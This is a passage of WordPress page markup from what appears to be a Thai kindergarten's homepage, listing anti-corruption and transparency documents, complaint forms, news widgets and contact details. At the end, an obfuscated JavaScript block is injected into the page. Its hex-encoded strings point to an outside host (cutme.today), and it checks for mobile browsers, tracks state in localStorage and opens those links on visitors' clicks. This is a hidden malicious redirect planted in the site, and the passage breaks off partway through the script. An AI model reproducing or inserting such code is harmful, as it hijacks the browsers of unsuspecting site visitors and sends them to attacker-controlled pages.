href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 